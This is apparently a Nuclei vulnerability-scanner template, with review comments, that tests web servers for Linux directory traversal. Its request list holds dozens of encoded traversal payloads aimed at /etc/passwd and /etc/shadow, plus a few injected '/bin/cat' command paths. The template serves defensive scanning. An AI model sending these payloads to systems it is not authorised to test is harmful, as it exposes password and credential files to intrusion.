dir-traversal.yaml
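# Nuclei template: sends a fixed list of path-traversal encodings to the
# target and reports a finding when a response has status 200 AND its body
# contains content that looks like /etc/passwd, /etc/shadow or /etc/hosts.
#
# A finding means the server resolved a request path outside its document
# root. The fix is on the server side: canonicalise the requested path after
# decoding and reject anything that does not stay under the served directory.
id: dir-traversal

info:
  name: Linux Directory Traversal
  author: Sappy
  severity: high
  description: Detects basic linux based directory traversal.

requests:
  - method: GET
    path:
      # Encoded-backslash variants, from the web root and from /static/.
      - "{{BaseURL}}/..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
      # Plain dot-dot-slash variants, with and without suffixes.
      - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/hosts%00"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/hosts"
      # NOTE(review): boot.ini is a Windows file and "%2A" names no file; the
      # matchers below only recognise passwd/shadow/hosts content, so these two
      # requests cannot produce a finding. Kept as in the original list.
      - "{{BaseURL}}/../../boot.ini"
      - "{{BaseURL}}/../../../../../../../../%2A"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd%00"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/shadow%00"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/shadow"
      - "{{BaseURL}}/../../../../../../../../../../etc/passwd^^"
      - "{{BaseURL}}/../../../../../../../../../../etc/shadow^^"
      - "{{BaseURL}}/../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../../../../../../etc/shadow"
      - "{{BaseURL}}/./././././././././././etc/passwd"
      - "{{BaseURL}}/./././././././././././etc/shadow"
      - "{{BaseURL}}/%0a/bin/cat%20/etc/passwd"
      - "{{BaseURL}}/%0a/bin/cat%20/etc/shadow"
      - "{{BaseURL}}/%00/etc/passwd%00"
      - "{{BaseURL}}/%00/etc/shadow%00"
      - "{{BaseURL}}/%00../../../../../../etc/passwd"
      - "{{BaseURL}}/%00../../../../../../etc/shadow"
      - "{{BaseURL}}/../../../../../../../../../../../etc/passwd%00.jpg"
      - "{{BaseURL}}/../../../../../../../../../../../etc/passwd%00.html"
      # Overlong-UTF-8 and percent-encoded dot variants.
      - "{{BaseURL}}/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
      - "{{BaseURL}}/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow"
      - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
      - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
      # NOTE(review): the next three end at "%00" without naming a file, so the
      # matchers below have nothing specific to recognise in the response.
      - "{{BaseURL}}%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
      - "{{BaseURL}}//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
      # The original entry read "..% 25%5c.."; the raw space made the request
      # path malformed and is presumably a typo for "%25", as in the two
      # entries above.
      - "{{BaseURL}}/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
      - "{{BaseURL}}//'/bin/cat%20/etc/passwd//'"
      - "{{BaseURL}}/image?filename=../../../etc/passwd"

    # Both matchers must hold: a 200 response AND recognisable file content.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # The original matched the bare words "root:" or "localhost". Any 200
      # page that mentions "localhost" (error pages, docs, inline scripts)
      # satisfied that, so soft-404 sites reported a high-severity finding for
      # every request. The patterns below require the surrounding file
      # structure instead.
      - type: regex
        regex:
          # root entry of /etc/passwd (root:x:0:0:) or /etc/shadow
          # (root:<hash>:<lastchange>:<min>:).
          - 'root:[^:\n]*:[0-9]+:[0-9]*:'
          # loopback entry of /etc/hosts. A hosts file that does not map
          # 127.0.0.1 to a name starting with "localhost" is not recognised.
          - '127\.0\.0\.1[ \t]+localhost'
        condition: or
        part: body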